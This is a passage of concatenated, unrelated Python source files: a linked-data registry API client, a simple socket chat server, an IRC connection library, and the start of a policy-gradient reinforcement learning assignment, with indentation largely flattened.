ret_dict = {}
async def _get_instance_for_key(_instance_uri):
nonlocal self
_instance = await self.instance(_instance_uri)
return _instance_uri, _instance
for c in range(chunks):
jobs = []
for p in range(0, 8):
_offset = (c*8)+p
if _offset >= instance_count:
break
instance_uri = index[_offset]
instance_job = _get_instance_for_key(instance_uri)
jobs.append(instance_job)
awaitable = asyncio.gather(*jobs, return_exceptions=True)
completed_jobs = await awaitable
for completed_job in completed_jobs:
identifier, instance = completed_job
if instance is None:
continue
elif isinstance(instance, Exception):
print(instance)
continue
try:
ret_dict[identifier] = instance
except Exception as e:
print(e)
continue
if min_count is not None and len(ret_dict) >= min_count:
break
return ret_dict
async def index_page(self, page=None, per_page=None):
"""
TODO: Ashley
:param page:
:type page:
:param per_page:
:type per_page:
:return:
:rtype:
"""
current_page, current_per_page, first, last = self.register.get_current_page_details()
if page is None:
page = current_page or 1
if per_page is None:
per_page = current_per_page or 100
first = first or 1
last = last or 1
if page < 1:
raise RuntimeError("Cannot execute an index call to register page less-than 1.")
if per_page < 1:
raise RuntimeError("Cannot execute an index call to register with items-per-page less-than 1.")
if page == current_page and per_page == current_per_page:
payload = self.register.payload
else:
payload = await self.client._get_register_index(self.register.uri, page, per_page)
if not payload:
return None
self.register.payload = payload
current_page, current_per_page, first, last = self.register.get_current_page_details()
index = self.register.filter_index(payload)
return AsyncBoundIndexPage(self, index, current_page, current_per_page, first, last)
async def instance(self, identifier):
"""
TODO: Ashley
:param identifier:
:type identifier:
:return:
:rtype:
"""
id_uri = self.register.make_instance_uri(identifier)
resp = await self.client._get_register_instance(self.register.uri, id_uri)
return resp
class BoundRegister(AbstractBoundRegister):
"""
TODO: Ashley
"""
__slots__ = tuple()
def _index_threaded(self, first, last, offset_entries, min_count):
"""
Gets all of the ids of instances on this register.
Note: this can take a long time for a large dataset.
:return:
:rtype: dict
"""
# plus 1 because first and last are inclusive.
num_threads = int(self.client.threads)
total_pages = (last - first) + 1
if total_pages < 1:
total_pages = 1
chunks = total_pages // num_threads
if chunks < 1:
chunks = 1
elif (total_pages % num_threads) > 0:
chunks += 1
index = {}
import threading
pages = {}
def _thread_job(i, p):
nonlocal self
nonlocal pages
try:
result = self.index_page(page=p)
pages[i] = result
except Exception as e:
pages[i] = e
for c in range(chunks):
jobs = []
            c_page_offset = c * num_threads
pages = {}
for i, p in enumerate(range(c_page_offset+first, c_page_offset+first+num_threads)):
page_job = threading.Thread(target=_thread_job, args=(i, p))
page_job.start()
jobs.append(page_job)
for j in jobs:
try:
j.join()
except Exception:
pass
for i, p in pages.items():
if p is None:
continue
elif isinstance(p, Exception):
print(p)
continue
if offset_entries:
skip_entries = sorted(p.index.keys())[:offset_entries]
for s in skip_entries:
_ = p.index.pop(s)
offset_entries = 0
try:
index.update(p.index)
except Exception as e:
print(e)
continue
if min_count is not None and len(index) >= min_count:
break
return index
def index(self, offset=None, min_count=None):
"""
Gets all of the ids of instances on this register
Note: this can take a long time for a large dataset
:return:
:rtype: dict
"""
current_page, current_per_page, first, last =\
self.register.get_current_page_details()
if last < first:
last = first
if last == first and offset is None:
return self.index_page(first).index
if offset and offset > 0:
offset_pages = offset // current_per_page
offset_entries = offset - (offset_pages * current_per_page)
first = first+offset_pages
last = last+offset_pages
else:
offset_entries = 0
if self.client.threads and self.client.threads > 1:
return self._index_threaded(first, last, offset_entries, min_count)
index = {}
for p in range(first, last+1):
page = self.index_page(page=p)
if page is None:
continue
elif isinstance(page, Exception):
print(page)
continue
if offset_entries:
skip_entries = sorted(page.index.keys())[:offset_entries]
for s in skip_entries:
_ = page.index.pop(s)
offset_entries = 0
try:
index.update(page.index)
except Exception as e:
print(e)
continue
if min_count is not None and len(index) >= min_count:
break
return index
def instances(self, index=None, min_count=None):
"""
Gets all of the instances on this register.
Note: this can take a *very* long time for a large dataset.
:return:
:rtype: dict
"""
if index is None:
index = self.index()
if isinstance(index, dict):
index = tuple(index.keys())
if self.client.threads and self.client.threads > 1:
return self._instances_threaded(index, min_count)
instance_count = len(index)
ret_dict = {}
for p in range(0, instance_count):
instance_uri = index[p]
instance = self.instance(instance_uri)
if instance is None:
continue
elif isinstance(instance, Exception):
print(instance)
continue
try:
ret_dict[instance_uri] = instance
except Exception as e:
print(e)
continue
if min_count is not None and len(ret_dict) >= min_count:
break
return ret_dict
def _instances_threaded(self, index, min_count):
"""
Gets all of the instances on this register.
Note: this can take a *very* long time for a large dataset.
:return:
:rtype: dict
"""
num_threads = int(self.client.threads)
if isinstance(index, dict):
index = tuple(index.keys())
instance_count = len(index)
chunks = instance_count // num_threads
if chunks < 1:
chunks = 1
elif (instance_count % num_threads) > 0:
chunks += 1
ret_dict = {}
import threading
instances = {}
def _get_instance_for_key(i, _instance_uri):
nonlocal self
nonlocal instances
try:
_instance = self.instance(_instance_uri)
instances[_instance_uri] = _instance
except Exception as e:
instances[_instance_uri] = e
for c in range(chunks):
jobs = []
instances = {}
for i, p in enumerate(range(0, num_threads)):
                _offset = (c * num_threads) + p
if _offset >= instance_count:
break
instance_uri = index[_offset]
instance_job = threading.Thread(target=_get_instance_for_key, args=(i, instance_uri))
instance_job.start()
jobs.append(instance_job)
for j in jobs:
try:
j.join()
except Exception:
pass
for identifier, instance in instances.items():
if instance is None:
continue
elif isinstance(instance, Exception):
print(instance)
continue
try:
ret_dict[identifier] = instance
except Exception as e:
print(e)
continue
if min_count is not None and len(ret_dict) >= min_count:
break
return ret_dict
def index_page(self, page=None, per_page=None):
"""
TODO: Ashley
:param page:
:type page:
:param per_page:
:type per_page:
:return:
:rtype:
"""
current_page, current_per_page, first, last = self.register.get_current_page_details()
if page is None:
page = current_page or 1
if per_page is None:
per_page = current_per_page or 100
first = first or 1
last = last or 1
if page < 1:
raise RuntimeError("Cannot execute an index call to register page less-than 1.")
if per_page < 1:
raise RuntimeError("Cannot execute an index call to register with items-per-page less-than 1.")
if page == current_page and per_page == current_per_page:
payload = self.register.payload
else:
payload = self.client._get_register_index(self.register.uri, page, per_page)
if not payload:
return None
self.register.payload = payload
current_page, current_per_page, first, last = self.register.get_current_page_details()
index = self.register.filter_index(payload)
return BoundIndexPage(self, index, current_page, current_per_page, first, last)
def instance(self, identifier):
"""
TODO: Ashley
:param identifier:
:type identifier:
:return:
:rtype:
"""
uri = self.register.make_instance_uri(identifier)
resp = self.client._get_register_instance(self.register.uri, uri)
return resp
class AbstractLDAPIClient(object, metaclass=ABCMeta):
"""
TODO: Ashley
"""
__slots__ = ('base_uri', 'url_remapper', '_registers', 'session')
def __init__(self, base_uri, *args, url_remapper=None, **kwargs):
"""
TODO: Ashley
:param base_uri:
:type base_uri:
:param args:
:type args:
:param url_remapper:
:type url_remapper:
:param kwargs:
:type kwargs:
"""
self.base_uri = base_uri
self.url_remapper = url_remapper
self._registers = {}
self.session = requests.Session()
self._populate_registers()
@abstractmethod
def _populate_registers(self):
"""
TODO: Ashley
:return:
"""
pass
def _remap_url(self, url):
"""
TODO: Ashley
:param url:
:type url:
:return:
"""
if self.url_remapper is None:
return url
for u, v in self.url_remapper.items():
if url.startswith(u):
url = url.replace(u, v)
break
return url
@abstractmethod
def register(self, reg_uri):
"""
TODO: Ashley
:param reg_uri:
:type reg_uri:
:return:
:rtype:
"""
pass
class LDAPIClient(AbstractLDAPIClient):
"""
TODO: Ashley
"""
__slots__ = ('threads',)
def __new__(cls, *args, asynchronous=False, **kwargs):
"""
TODO: Ashley
:param args:
:type args:
:param asynchronous:
:type asynchronous:
:param kwargs:
:type kwargs:
:return:
:rtype:
"""
if asynchronous:
return AsyncLDAPIClient(*args, **kwargs)
self = super(LDAPIClient, cls).__new__(cls)
return self
def __init__(self, base_uri, *args, url_remapper=None,
threads=1, **kwargs):
"""
:param base_uri:
:type base_uri:
:param args:
:type args:
:param url_remapper:
:type url_remapper:
:param threads:
:type threads:
:param kwargs:
:type kwargs:
"""
super(LDAPIClient, self).__init__(
base_uri, *args, url_remapper=url_remapper, **kwargs)
self.threads = threads
def register(self, reg_uri):
"""
TODO: Ashley
:param reg_uri:
:type reg_uri:
:return:
:rtype:
"""
try:
register = self._registers[reg_uri]
except KeyError as k:
raise ValueError(*k.args)
return BoundRegister(register, client=self)
def _get_register_instance(self, register_uri, instance_uri):
"""
TODO: Ashley
:param register_uri:
:type register_uri:
:param instance_uri:
:type instance_uri:
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(instance_uri)
resp = self.session.get(url, headers=headers)
if resp.status_code == 404:
raise RuntimeError((404, instance_uri))
elif resp.status_code == 500:
raise RuntimeError((500, instance_uri))
if resp.status_code != 200:
return resp.status_code
text = resp.text
payload = json.loads(text)
return payload
def _get_register_index(self, register_uri, page=1, per_page=100):
"""
TODO: Ashley
:param register_uri:
:type register_uri:
:param page:
:type page:
:param per_page:
:type per_page:
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(register_uri)
resp = self.session.get(
url, headers=headers,
params={'page': page, 'per_page': per_page},
timeout=900
)
if resp.status_code != 200:
return None
text = resp.text
payload = json.loads(text)
return payload
def _populate_registers(self):
"""
TODO: Ashley
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(self.base_uri)
response = self.session.get(url, headers=headers)
if response.status_code != 200:
raise RuntimeError("Cannot get base register.")
text = response.text
json_struct = json.loads(text)
registers = find_registers_from_ld_payload(self.base_uri, json_struct, LoadedRegister)
first_registers = list(registers.keys())
for uri in first_registers:
r = registers[uri]
if not r.payload:
url = self._remap_url(uri)
response = self.session.get(url, headers=headers)
if response.status_code != 200:
raise RuntimeError("Cannot get linked register: {}".format(uri))
text = response.text
json_struct = json.loads(text)
new_registers = find_registers_from_ld_payload(uri, json_struct, LoadedRegister)
registers.update(new_registers)
self._registers = registers
def close(self):
self.session.close()
class AsyncLDAPIClient(AbstractLDAPIClient):
"""
TODO: Ashley
"""
__slots__ = ('_loop',)
def __new__(cls, *args, loop=None, **kwargs):
"""
TODO: Ashley
:param args:
:type args:
:param loop:
:type loop:
:param kwargs:
:type kwargs:
:return:
:rtype:
"""
if loop is None:
loop = asyncio.get_event_loop()
self = super(AsyncLDAPIClient, cls).__new__(cls)
self._loop = loop
asyncio.set_event_loop(loop)
return self.__async_init__(*args, **kwargs)
def __init__(self, *args, **kwargs):
"""
TODO: Ashley
:param args:
:type args:
:param kwargs:
:type kwargs:
"""
# deliberately don't call super init here, because we use an async init
object.__init__(self)
def register(self, reg_uri):
"""
TODO: Ashley
:param reg_uri:
:type reg_uri:
:return:
:rtype:
"""
try:
register = self._registers[reg_uri]
except KeyError as k:
raise ValueError(*k.args)
return AsyncBoundRegister(register, client=self)
async def _get_register_instance(self, register_uri, instance_uri):
"""
TODO: Ashley
:param register_uri:
:type register_uri:
:param instance_uri:
:type instance_uri:
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(instance_uri)
resp = await self.session.get(url, headers=headers)
if resp.status != 200:
return resp.status
text = await resp.text()
payload = json.loads(text)
return payload
async def _get_register_index(self, register_uri, page=1, per_page=100):
"""
TODO: Ashley
:param register_uri:
:type register_uri:
:param page:
:type page:
:param per_page:
:type per_page:
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(register_uri)
resp = await self.session.get(
url, headers=headers,
params={'page': page, 'per_page': per_page},
timeout=900
)
if resp.status != 200:
return None
text = await resp.text()
payload = json.loads(text)
return payload
async def _populate_registers(self):
"""
TODO: Ashley
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(self.base_uri)
response = await self.session.get(url, headers=headers)
if response.status != 200:
raise RuntimeError("Cannot get base register.")
text = await response.text()
json_struct = json.loads(text)
registers = find_registers_from_ld_payload(self.base_uri, json_struct, LoadedRegister)
first_registers = list(registers.keys())
for uri in first_registers:
r = registers[uri]
if not r.payload:
url = self._remap_url(uri)
response = await self.session.get(url, headers=headers, params={"per_page": 1})
if response.status != 200:
raise RuntimeError("Cannot get linked register: {}".format(uri))
text = await response.text()
json_struct = json.loads(text)
new_registers = find_registers_from_ld_payload(uri, json_struct, LoadedRegister)
registers.update(new_registers)
self._registers = registers
async def __async_init__(self, base_uri, *args, url_remapper=None, **kwargs):
"""
TODO: Ashley
:param base_uri:
:type base_uri:
:param args:
:type args:
:param url_remapper:
:type url_remapper:
:param kwargs:
:type kwargs:
:return:
:rtype:
"""
self.base_uri = base_uri
self.url_remapper = url_remapper
self._registers = {}
self.session = aiohttp.ClientSession()
await self._populate_registers()
return self
async def close(self):
"""
TODO: Ashley
:return:
:rtype:
"""
r = await self.session.close()
return r
@property
def loop(self):
"""
TODO: Ashley
:return:
:rtype:
"""
return self._loop
__all__ = ['LDAPIClient']
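# Minimal usage sketch (hypothetical URIs; not part of the package):
#
#   client = LDAPIClient("https://example.org/api/", threads=4)
#   reg = client.register("https://example.org/api/sites/")  # ValueError if the register is unknown
#   ids = reg.index(min_count=10)        # dict: instance URI -> register entry
#   items = reg.instances(index=ids)     # dict: instance URI -> full instance payload
#   client.close()
#
# The asynchronous variant is obtained by awaiting construction, e.g.:
#   client = await LDAPIClient("https://example.org/api/", asynchronous=True)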
|
server.py
|
import socket
import threading
PORT = 9090
HOST = socket.gethostbyname(socket.gethostname())  # IP address of the local machine
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
clients = []
def start():
"""
Thread to accept clients
:return: None
"""
server.listen()
print("[SERVER] Server is listening now...")
while True:
try:
client_socket, address = server.accept()
clients.append(client_socket)
print(f"{address} is connected")
thread = threading.Thread(target=client_handle , args=(client_socket,))
thread.start()
except Exception as e:
print("[EXCEPTIO]", e)
def client_handle(client_socket):
"""
Handle messages from the client
:param client_socket: socket
:return: None
"""
try:
name = client_socket.recv(1024).decode('utf-8')
broadcast(f"{name} is connected now! :", "")
while True:
msg = client_socket.recv(1024).decode('utf-8')
if msg == 'exit':
clients.remove(client_socket)
broadcast(f"{name} has left the room! :", "")
break
else:
broadcast(msg, name)
except Exception as e:
print('[EXCEPTION]', e)
client_socket.close()
def broadcast(message, name):
"""
send messages to all clients
:param message: str
:param name: str
:return: None
"""
for client in clients:
try:
client.send(f'{name} : {message}'.encode('utf-8'))
except:
print('[EXCEPTION ON BROADCAST]')
if __name__ == '__main__':
start()
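# Minimal client sketch (hypothetical; not part of the original server). The protocol is:
# the first message a client sends is its display name, subsequent messages are chat
# lines, and sending 'exit' asks the server to drop the connection.
#
#   import socket
#   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   sock.connect((HOST, PORT))
#   sock.send('alice'.encode('utf-8'))       # display name
#   sock.send('hello everyone'.encode('utf-8'))
#   print(sock.recv(1024).decode('utf-8'))   # read one broadcast back
#   sock.send('exit'.encode('utf-8'))
#   sock.close()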
|
irc.py
|
"""Easy to use module for connection to IRC."""
from __future__ import annotations
import logging
import textwrap
import threading
from logging import Logger
from queue import Queue
from threading import Event, Thread
from time import sleep
from typing import Generator, Optional, Set, Type
from irc.exception import IRCConnectionException, IRCException, IRCSocketClosedException, IRCSocketException
from irc.messages import IRCBaseMessage, IRCControlMessage, IRCMessage
from irc.socket import Socket
# Many IRC servers will kick the user if it does not reply for about 240s
# It is also common for them to send PING messages to ensure that the
# socket is alive, every 90s or so. Using 300s as a hard timeout ensures that we will
# handle PING messages in time, but still disconnect quite fast if there
# is an issue with the socket
default_timeout = 300
version = "1.0.0"
class IRC: # pylint: disable=too-many-instance-attributes,too-many-arguments
"""IRC connector."""
def __init__(
self,
server: str,
port: int,
user: str,
nick: str,
gecos: str = "",
timeout: float = default_timeout,
use_tls: bool = False,
logger: Optional[Logger] = None
) -> None:
self.__timeout = timeout
self.__logger = logging.getLogger(__name__) if logger is None else logger
self.__socket = Socket(server, port, timeout, logger=self.__logger, use_tls=use_tls)
self.__user = user
self.__nick = nick
self.__gecos = gecos
self.__channels: Set[str] = set()
# Create a thread and event handler for ingress messages
self.__ingress_thread_should_run = Event()
self.__ingress_thread = Thread(target=self.__handle_ingress_messages)
self.__ingress_thread.daemon = True
# Queue of parsed messages received from the server
self.__ingress_messages: Queue[IRCBaseMessage] = Queue() # pylint: disable=unsubscriptable-object
# Create a thread and event handler for egress messages
self.__egress_thread_should_run = Event()
self.__egress_thread = Thread(target=self.__handle_egress_messages)
self.__egress_thread.daemon = True
# Queue of raw messages to send to the server
self.__egress_messages: Queue[bytes] = Queue() # pylint: disable=unsubscriptable-object
@property
def messages(self) -> Generator[IRCBaseMessage, None, None]:
"""A generator containing all received messages as they come."""
while True:
message = self.__ingress_messages.get()
self.__ingress_messages.task_done()
yield message
@property
def version(self) -> str:
"""The version of the IRC library."""
return version
def connect(self) -> None:
"""Connect to the server."""
if self.__ingress_thread_should_run.is_set() or self.__egress_thread_should_run.is_set():
raise IRCConnectionException("Already connected")
        # Connect the underlying socket
self.__logger.info("Connecting to server")
self.__socket.connect()
self.__logger.info("Connected to server")
self.login()
# Start the ingress thread
self.__logger.info("Starting ingress thread")
self.__ingress_thread_should_run.set()
self.__ingress_thread.start()
# Start the egress thread
self.__logger.info("Starting egress thread")
self.__egress_thread_should_run.set()
self.__egress_thread.start()
def login(self) -> None:
"""Login to the server."""
self.__logger.info("Logging in")
self.send("User {0} {0} {0} :{1}\r\n".format(self.__user, self.__gecos))
self.send("NICK {0}\r\n".format(self.__nick))
def reconnect(self) -> None:
"""Reconnect to the server."""
if not self.__ingress_thread_should_run.is_set() or not self.__egress_thread_should_run.is_set():
raise IRCConnectionException("Not connected")
        # Connect the underlying socket; this may retry indefinitely
# The number of seconds to wait before reconnecting, using exponential backoff
reconnect_wait = 1
while True:
try:
self.__logger.info("Attempting to reconnect")
self.__socket.connect()
except IRCSocketException:
self.__logger.error("Unable to reconnect", exc_info=True)
self.__logger.info("Trying to reconnect again in %ds", reconnect_wait)
sleep(reconnect_wait)
reconnect_wait += reconnect_wait
continue
break
self.__logger.info("Reconnected to server")
self.login()
for channel in self.__channels:
self.join(channel, ignore_duplicate=True)
def disconnect(self) -> None:
"""Disconnect from the server."""
self.__logger.info("Disconnecting from server")
self.__logger.debug("Telling the message threads to stop handling jobs")
self.__ingress_thread_should_run.clear()
self.__egress_thread_should_run.clear()
# Join the threads - waiting for them to complete before returning
# from the disconnect call
self.__logger.debug("Joining message threads")
        is_ingress_thread = threading.current_thread() is self.__ingress_thread
        is_egress_thread = threading.current_thread() is self.__egress_thread
        if not is_ingress_thread and not is_egress_thread:
self.__ingress_thread.join()
self.__egress_thread.join()
def send(self, message: str) -> None:
"""Send a raw message to the server."""
if len(message.encode()) > 512:
raise IRCException("Message is too long. Cannot be longer than 512 bytes - was {}"
.format(len(message.encode())))
self.__egress_messages.put(message.encode())
def send_message(self, target: str, message: str) -> None:
"""Send a message."""
self.__logger.debug("Sending message to %s", target)
for line in textwrap.wrap(message, width=(512 - len(target) - 12)):
self.send("PRIVMSG {} :{}\r\n".format(target, line))
def send_notice(self, target: str, notice: str) -> None:
"""Send a notice."""
self.__logger.debug("Sending notice to %s", target)
for line in textwrap.wrap(notice, width=(512 - len(target) - 11)):
self.send("NOTICE {} :{}\r\n".format(target, line))
def join(self, channel: str, ignore_duplicate: bool = False) -> None:
"""Join a channel."""
if not ignore_duplicate and channel in self.__channels:
raise IRCException("Already part of that channel")
self.__logger.info("Joining channel %s", channel)
self.send("JOIN {}\r\n".format(channel))
self.__channels.add(channel)
def __handle_ingress_messages(self) -> None:
"""Threaded ingress entrypoint of the IRC client."""
# Run the connector's main loop for as long as it's not disconnected
while self.__ingress_thread_should_run.is_set():
# Attempt to read once immediately
try:
raw_data = self.__socket.read_all()
except IRCSocketClosedException:
self.__logger.info("Socket has closed, reconnecting")
self.reconnect()
continue
# If there is no data, poll the socket for more data
if raw_data is None:
self.__logger.debug("No data available, waiting %ds", self.__timeout)
try:
self.__socket.wait_for_data(self.__timeout)
except IRCSocketException:
self.__logger.debug("Timeout while reading data - reconnecting")
self.reconnect()
continue
lines = raw_data.decode().splitlines()
self.__logger.debug("Server sent %d lines", len(lines))
for line in lines:
# Try to parse the line using all available message parsers
parsers: Set[Type[IRCBaseMessage]] = {IRCControlMessage, IRCMessage}
messages = [parser.parse(line) for parser in parsers]
# Add each non-null message to the message queue
parsed_messages = [message for message in messages if message is not None]
if len(parsed_messages) == 0:
# Handle pinging internally - don't expose it as a message
if line.startswith("PING"):
self.__logger.debug("Got PING, responding with PONG")
self.send("PONG {}\r\n".format(line.split(" ")[1:]))
else:
self.__logger.debug("Unhandled message: <%s>", line)
else:
# Add all parsed messages to the message queue
for parsed_message in parsed_messages:
self.__ingress_messages.put(parsed_message)
self.__logger.debug("Parsed %d messages and added them to the queue", len(parsed_messages))
def __handle_egress_messages(self) -> None:
"""Threaded egress entrypoint of the IRC client."""
while self.__egress_thread_should_run.is_set():
message = self.__egress_messages.get()
try:
self.__socket.write(message)
self.__egress_messages.task_done()
except IRCSocketException:
self.__logger.error("Unable to send message", exc_info=True)
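# Minimal usage sketch (hypothetical server and nick; not part of the library):
#
#   irc = IRC("irc.example.org", 6667, user="examplebot", nick="examplebot")
#   irc.connect()
#   irc.join("#example")
#   for message in irc.messages:
#       print(message)      # `messages` is an endless generator; break to stop
#   irc.disconnect()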
|
train_pg.py
|
import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
with tf.variable_scope(scope):
# YOUR_CODE_HERE
output = input_placeholder
for i in range(n_layers):
output = tf.layers.dense(inputs=output, units=size, activation=activation)
output = tf.layers.dense(inputs=output, units=output_size, activation=output_activation)
return output
def pathlength(path):
return len(path["reward"])
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, ac_dim, 'sy_logits_na', n_layers, size)
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1]) # Hint: Use the tf.multinomial op
sy_logprob_n = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, ac_dim, 'sy_logits_na', n_layers, size)
sy_logstd = tf.get_variable('sy_logstd', shape=[ac_dim], dtype=tf.float32) # logstd should just be a trainable variable, not a network output.
sy_std = tf.exp(sy_logstd)
sy_sampled_ac = sy_mean + sy_std * tf.random_normal((tf.shape(sy_mean)[0], ac_dim))
        # Negated so that minimizing `loss` below matches the discrete branch, which uses the
        # cross-entropy (i.e. the negative log probability).
        sy_logprob_n = -tf.contrib.distributions.MultivariateNormalDiag(sy_mean, sy_std).log_prob(sy_ac_na)  # Hint: Use the log probability under a multivariate gaussian.
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
loss = tf.reduce_mean(sy_adv_n * sy_logprob_n) # Loss function that we'll differentiate to get the policy gradient.
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
baseline_target_n = tf.placeholder(shape=[None], name="reward", dtype=tf.float32)
loss_baseline = tf.nn.l2_loss(baseline_target_n - baseline_prediction)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss_baseline)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# YOUR_CODE_HERE
q_i = []
for path in paths:
reward = path["reward"]
if not reward_to_go:
